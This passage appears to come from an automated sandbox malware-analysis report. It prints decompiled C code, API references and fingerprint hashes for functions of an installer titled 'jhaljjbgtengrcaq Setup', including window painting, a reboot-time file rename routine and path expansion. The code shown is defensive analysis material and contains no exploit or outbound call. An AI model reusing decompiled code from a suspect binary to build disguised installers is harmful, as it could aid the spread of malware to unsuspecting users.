						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404227();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42371c; // 0x526e38
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423f78; // 0x5256c8
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F68;
				E00403E54(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E54(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E89(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f50; // 0x520d18
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4fc =  *0x41f4fc & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420518 =  *0x420518 & 0x00000000;
				return 0;
			}




















                                                  0x00403fac
                                                  0x004040d2
                                                  0x0040412e
                                                  0x00404132
                                                  0x00404209
                                                  0x0040420b
                                                  0x0040420b
                                                  0x00404211
                                                  0x00404211
                                                  0x00404214
                                                  0x00000000
                                                  0x0040421b
                                                  0x00404140
                                                  0x00404142
                                                  0x0040414c
                                                  0x00404157
                                                  0x0040415a
                                                  0x0040415d
                                                  0x00404168
                                                  0x0040416b
                                                  0x00404172
                                                  0x00404180
                                                  0x00404198
                                                  0x004041a0
                                                  0x004041ab
                                                  0x004041bb
                                                  0x004041bd
                                                  0x004041bd
                                                  0x00404172
                                                  0x004041c7
                                                  0x00000000
                                                  0x004041d2
                                                  0x004041d6
                                                  0x004041e7
                                                  0x004041e7
                                                  0x004041ed
                                                  0x004041fb
                                                  0x004041fb
                                                  0x00000000
                                                  0x004041ff
                                                  0x004041c7
                                                  0x004040dd
                                                  0x00000000
                                                  0x004040f1
                                                  0x004040f7
                                                  0x004040fd
                                                  0x00000000
                                                  0x00000000
                                                  0x00404122
                                                  0x00404124
                                                  0x00404129
                                                  0x00000000
                                                  0x00404129
                                                  0x004040dd
                                                  0x00403fb2
                                                  0x00403fb5
                                                  0x00403fba
                                                  0x00403fbc
                                                  0x00403fcb
                                                  0x00403fcb
                                                  0x00403fcd
                                                  0x00403fd2
                                                  0x00403fd5
                                                  0x00403fd7
                                                  0x00403fdc
                                                  0x00403fe5
                                                  0x00403feb
                                                  0x00403ff7
                                                  0x00403ffa
                                                  0x00404003
                                                  0x00404008
                                                  0x0040400b
                                                  0x00404010
                                                  0x00404027
                                                  0x0040402e
                                                  0x00404041
                                                  0x00404044
                                                  0x00404059
                                                  0x0040405b
                                                  0x00404060
                                                  0x00404065
                                                  0x0040406a
                                                  0x0040406a
                                                  0x00404079
                                                  0x00404088
                                                  0x0040408a
                                                  0x004040a0
                                                  0x004040af
                                                  0x004040b1
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: 8nR$N$open$.B
                                                  • API String ID: 3615053054-629043961
                                                  • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                  • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                                  • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                  • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f50; // 0x520d18
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "jhaljjbgtengrcaq Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f48; // 0x20324
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                  0x0040100a
                                                  0x00401039
                                                  0x00401047
                                                  0x0040104d
                                                  0x00401051
                                                  0x0040105b
                                                  0x00401061
                                                  0x00401064
                                                  0x004010f3
                                                  0x00401089
                                                  0x0040108c
                                                  0x004010a6
                                                  0x004010bd
                                                  0x004010cc
                                                  0x004010cf
                                                  0x004010d5
                                                  0x004010d9
                                                  0x004010e4
                                                  0x004010ed
                                                  0x004010ef
                                                  0x004010ef
                                                  0x00401100
                                                  0x00401105
                                                  0x0040110d
                                                  0x00401110
                                                  0x00401112
                                                  0x00401118
                                                  0x0040111f
                                                  0x00401126
                                                  0x00401130
                                                  0x00401142
                                                  0x00401156
                                                  0x00401160
                                                  0x00401165
                                                  0x00401165
                                                  0x00401110
                                                  0x0040116e
                                                  0x00000000
                                                  0x00401178
                                                  0x00401010
                                                  0x00401013
                                                  0x00401015
                                                  0x00401019
                                                  0x0040101f
                                                  0x0040101f
                                                  0x00000000

                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32 ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,jhaljjbgtengrcaq Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F$jhaljjbgtengrcaq Setup
                                                  • API String ID: 941294808-171091807
                                                  • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                  • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                                  • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                  • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004058E6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E004058E6(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F28(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fd0 =  *0x423fd0 + 1;
						return _t20;
					}
				}
				 *0x4226c8 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
						_t18 =  *0x423f50; // 0x520d18
						_t56 = _t55 + 0x10;
						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040586F(0x422140, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405830(_t51 + _t29, 0x421d40, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B98(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040586F(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                  0x004058ec
                                                  0x004058f3
                                                  0x004058f7
                                                  0x00405900
                                                  0x00405904
                                                  0x00405a43
                                                  0x00405a43
                                                  0x00000000
                                                  0x00405a43
                                                  0x00405904
                                                  0x00405910
                                                  0x00405926
                                                  0x0040594e
                                                  0x00405959
                                                  0x0040595d
                                                  0x0040597d
                                                  0x0040597f
                                                  0x00405984
                                                  0x0040598e
                                                  0x0040599b
                                                  0x004059a0
                                                  0x004059a5
                                                  0x004059a9
                                                  0x00000000
                                                  0x00000000
                                                  0x004059b8
                                                  0x004059ba
                                                  0x004059c7
                                                  0x004059cb
                                                  0x00405a3c
                                                  0x00405a3d
                                                  0x00000000
                                                  0x004059e7
                                                  0x004059f4
                                                  0x00405a59
                                                  0x00405a60
                                                  0x00405a07
                                                  0x00405a07
                                                  0x00405a09
                                                  0x00405a12
                                                  0x00405a1d
                                                  0x00405a2f
                                                  0x00405a36
                                                  0x00000000
                                                  0x00405a36
                                                  0x00405a62
                                                  0x00405a63
                                                  0x00405a68
                                                  0x00405a6a
                                                  0x00405a77
                                                  0x00405a77
                                                  0x00405a7b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405a6c
                                                  0x00405a6c
                                                  0x00405a6f
                                                  0x00405a72
                                                  0x00405a73
                                                  0x00000000
                                                  0x00405a6c
                                                  0x004059ff
                                                  0x00405a04
                                                  0x00000000
                                                  0x00405a04
                                                  0x004059cb
                                                  0x00405928
                                                  0x00405933
                                                  0x0040593c
                                                  0x00405940
                                                  0x00000000
                                                  0x00000000
                                                  0x00405940
                                                  0x00405a4d

                                                  APIs
                                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405933
                                                  • GetShortPathNameA.KERNEL32 ref: 0040593C
                                                  • GetShortPathNameA.KERNEL32 ref: 00405959
                                                  • wsprintfA.USER32 ref: 00405977
                                                  • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004059D7
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A2F
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405A36
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A3D
                                                    • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                    • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                  • String ID: %s=%s$@!B$[Rename]
                                                  • API String ID: 3445103937-2946522640
                                                  • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                  • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                                  • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                  • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405BBA, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42371c; // 0x526e38
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423f78; // 0x5256c8
				_t74 = _t73 + _t36;
				_t37 = 0x422ee0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422ee0;
				if(_a4 - 0x422ee0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422ee0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405AF6(_t86,  *0x423f48);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DFA(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423fc4;
						if( *0x423fc4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f44; // 0x74951528
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BBA(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B98(_a4, _t37);
			}






























                                                  0x00405bba
                                                  0x00405bba
                                                  0x00405bba
                                                  0x00405bc0
                                                  0x00405bc5
                                                  0x00405bc7
                                                  0x00405bd6
                                                  0x00405bd6
                                                  0x00405bd8
                                                  0x00405be1
                                                  0x00405be3
                                                  0x00405be8
                                                  0x00405beb
                                                  0x00405bec
                                                  0x00405bf3
                                                  0x00405bf5
                                                  0x00405bfb
                                                  0x00405bfe
                                                  0x00405bfe
                                                  0x00405dd7
                                                  0x00405dd7
                                                  0x00405ddb
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c0b
                                                  0x00405c11
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c17
                                                  0x00405c18
                                                  0x00405c1b
                                                  0x00405c1e
                                                  0x00405dca
                                                  0x00405dd4
                                                  0x00405dd6
                                                  0x00405dd6
                                                  0x00405dcc
                                                  0x00405dce
                                                  0x00405dd0
                                                  0x00405dd1
                                                  0x00405dd1
                                                  0x00000000
                                                  0x00405dca
                                                  0x00405c24
                                                  0x00405c28
                                                  0x00405c38
                                                  0x00405c3c
                                                  0x00405c43
                                                  0x00405c46
                                                  0x00405c4a
                                                  0x00405c50
                                                  0x00405c53
                                                  0x00405c56
                                                  0x00405c59
                                                  0x00405d74
                                                  0x00405d77
                                                  0x00405da7
                                                  0x00405daa
                                                  0x00405daf
                                                  0x00405db3
                                                  0x00405db3
                                                  0x00405db8
                                                  0x00405db9
                                                  0x00405dbe
                                                  0x00405dc1
                                                  0x00405dc3
                                                  0x00000000
                                                  0x00405dc3
                                                  0x00405d79
                                                  0x00405d7c
                                                  0x00405d91
                                                  0x00405d98
                                                  0x00405d7e
                                                  0x00405d85
                                                  0x00405d85
                                                  0x00405da0
                                                  0x00405da3
                                                  0x00405d6c
                                                  0x00405d6d
                                                  0x00405d6d
                                                  0x00000000
                                                  0x00405da3
                                                  0x00405c61
                                                  0x00405c62
                                                  0x00405c68
                                                  0x00405c6a
                                                  0x00405c84
                                                  0x00405c84
                                                  0x00405c8b
                                                  0x00405c8b
                                                  0x00405c92
                                                  0x00405c96
                                                  0x00405c96
                                                  0x00405c97
                                                  0x00405c99
                                                  0x00405cd2
                                                  0x00405cd5
                                                  0x00405ce5
                                                  0x00405ce8
                                                  0x00405cf0
                                                  0x00405cf6
                                                  0x00405cf6
                                                  0x00405d52
                                                  0x00405d52
                                                  0x00405d54
                                                  0x00000000
                                                  0x00000000
                                                  0x00405cfa
                                                  0x00405d01
                                                  0x00405d02
                                                  0x00405d04
                                                  0x00405d1e
                                                  0x00405d2c
                                                  0x00405d32
                                                  0x00405d34
                                                  0x00405d4f
                                                  0x00405d4f
                                                  0x00405d4f
                                                  0x00000000
                                                  0x00405d4f
                                                  0x00405d3a
                                                  0x00405d45
                                                  0x00405d4b
                                                  0x00405d4d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d4d
                                                  0x00405d06
                                                  0x00405d09
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d18
                                                  0x00405d1a
                                                  0x00405d1c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d1c
                                                  0x00000000
                                                  0x00405d52
                                                  0x00405cdd
                                                  0x00000000
                                                  0x00405c9b
                                                  0x00405ca0
                                                  0x00405cb6
                                                  0x00405cbb
                                                  0x00405cbe
                                                  0x00405d5b
                                                  0x00405d5b
                                                  0x00405d5f
                                                  0x00405d67
                                                  0x00405d67
                                                  0x00000000
                                                  0x00405d5f
                                                  0x00405cc8
                                                  0x00405d56
                                                  0x00405d56
                                                  0x00405d59
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d59
                                                  0x00405c99
                                                  0x00405c6c
                                                  0x00405c70
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c72
                                                  0x00405c76
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c78
                                                  0x00405c7c
                                                  0x00000000
                                                  0x00405c7e
                                                  0x00405c7e
                                                  0x00000000
                                                  0x00405c7e
                                                  0x00405c7c
                                                  0x00405de1
                                                  0x00405deb
                                                  0x00405df7
                                                  0x00405df7
                                                  0x00000000

                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                                  • GetSystemDirectoryA.KERNEL32(ksurfviwic,00000400), ref: 00405CDD
                                                  • GetWindowsDirectoryA.KERNEL32(ksurfviwic,00000400), ref: 00405CF0
                                                  • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                                  • SHGetPathFromIDListA.SHELL32(0040F0E0,ksurfviwic), ref: 00405D3A
                                                  • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                                  • lstrcatA.KERNEL32(ksurfviwic,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                                  • lstrlenA.KERNEL32(ksurfviwic,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: 8nR$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$ksurfviwic
